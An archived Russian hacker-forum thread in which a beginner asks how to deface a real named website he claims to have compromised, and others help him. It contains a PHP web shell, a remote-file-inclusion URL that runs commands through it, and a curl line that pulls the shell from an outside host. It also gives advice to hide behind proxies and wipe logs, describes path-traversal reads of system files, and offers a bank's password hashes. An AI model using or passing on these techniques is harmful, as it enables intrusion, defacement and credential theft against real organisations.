Форумы на Хакер

Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.

Помогите Новичку или Первый Дефейс

Пользователи, просматривающие топик: none

Зашли как: Guest

Все форумы >> [В Сети] >> Помогите Новичку или Первый Дефейс

Имя

Сообщение

<< Старые топики Новые топики >>

Помогите Новичку или Первый Дефейс - 2005-06-16 07:47:35

Kapis

Сообщений: 16
Оценки: 0
Присоединился: 2005-06-15 22:36:03

Получил доступ к domains.mail.ru на хостинге www.rbc.ru
В Директории htdocs
Хотелось бы заменить. их imаgе на мой.
../../domains.mail.ru/htdocs/i/mail2.gif

Подскажите пожалуйста как залить Свою Картинку или скрипт.
Ни разу не заливал… незнаю как.
Слышал про wget и GET. НО как ???

Пробовал межсайтовым.. типа. index.php?page=http://xxx.narod.ru/remview.php
Получается смотреть Директории и файлы. Но скрипт не работает до конца.
Если не трудно подскажите чего нового..
Заранее спасибо.

P.S.НЕ ругайтесь сильно… [sm=14.gif]

Post #: 1

Помогите Новичку или Первый Дефейс - 2005-06-17 11:48:07

c01dyr

Сообщений: 22
Оценки: 0
Присоединился: 2004-12-26 06:11:22

залей на свой серв шелл "shell.php" типа такого:
<?
echo "<pre>";
if (@$cmd) passthru($cmd);
echo "</pre>";
?>

теперь выполняй комманду
index.php?page=http://xxx.narod.ru/shell.php&cmd=[команды]
[команды] должны быть следущие:
id - проверяет твои права(для работоспособности шелла)
which wget - проверяет стоит ли качалка wget
which curl - проверяет стоит ли curl качалка
если что-нибудь из этого стоит то выполняешь комманду:
curl -o ./shell.php http://xxx.narod.ru/shell.php
только предварительно закачивай в диру с установленными правами на запись (что то вроде tmp)

Но не рекомендую этого делать предварительно не обезапасив себя через анонимный прокси и не удалив после себя логи.
Вообще для начинающих очень полезными окажутся сайт antichat.ru, video.antichat.net,
nsd.ru,web-hack.ru

Post #: 2

Помогите Новичку или Первый Дефейс - 2005-06-18 00:09:09

anim

Сообщений: 152
Оценки: 0
Присоединился: 2004-11-30 19:25:15

скорей всего тебе не хватит прав на заливку в htdocs

Post #: 3

Помогите Новичку или Первый Дефейс - 2005-06-18 15:20:51

Kapis

Сообщений: 16
Оценки: 0
Присоединился: 2005-06-15 22:36:03

c01dyr Спасибо…

Я пробовал.. не получается.
cgi-bin/index.php?page=../../../../etc%00 получается.
Хотя нет тут даже.. Index.cgi?page=../../../../etc%00
Просматриваются все Папки вплоть до index.cgi?page=../
master.passwd В нем пусто.
Shadow вообще нет.. как я понял или НЕТУ или Permission Denied.
index.cgi?page=http://xxx.narod.ru/shell.php&cmd=id не реагирует.
Показывает пустую страницу. просто белую.
Есть ли еще способы залить скрипт если..
Имееш доступ через ../../../../..%00

Нашел также пароли в md5 с сайта Банка www.kmb.ru
"Банк Коммерциализации малого Бизнеса" Лежали в папке ../www.kmb.ru/data/secure/.htpasswd%00
John что-то не хочет расшифровывать… -single`ом
или пароль такой оказался "akmb1969"

Кому надо в md5 пишите: 259-492-480

Post #: 4

Страниц: [1]

Все форумы >> [В Сети] >> Помогите Новичку или Первый Дефейс

Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.